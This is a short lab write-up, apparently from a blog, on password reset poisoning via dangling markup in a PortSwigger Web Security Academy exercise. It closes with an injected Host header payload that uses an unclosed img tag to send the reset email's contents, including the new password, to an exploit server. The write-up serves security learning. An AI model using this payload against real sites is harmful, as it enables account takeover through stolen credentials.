Host Header Manipulations — Password reset poisoning via dangling markup
I tried several methods but I will focus on explaining the solution and the underlying logic. I won’t cover the discovery part of the vulnerability. The things are happening on the raw content of the email, specifically the HTML components within the received email.
<p>Hello!</p><p>Please
<a href=’https://0a74005d04afe10a80a90d2f00560028.web-security-academy.net/login'> click here</a> to login with your new password: uXnd8nC8ym</p><p>Thanks,<br/>Support team</p><i> This email has been scanned by the MacCarthy Email Security service</i>
Regarding to the lab header I need to inject the payload after the <a href> and that is the Host header of the request. Firstly let’s try to close the <a href> tag.
I received a 504 Gateway Timeout error. This is an expert lab and I assumed that there may be a vulnerability with the parsers. As I mentiones at the beginning of the article, I attempted several methods. I learned new techniques on the education section of the Portswigger Academy.
1. Added an arbitrary port such as “:12345,” and the request is accepted.
2. I closed the <a href> tag. Success! I am on the right track.
It is clear from the picture above that I have started to see the effects.
3. I added an <img> tag to specify the source host.
4. I completed payload for the Hosy URL is: :12345'><img src=”https://exploit-server?/
There are two important things in the payload. The first one is to do not close the <img> tag due to the dangling. The other one is the ?/ part, It is crucial to retrieve the entire email content by treating them as a query string, we ensure the successful retrieval.
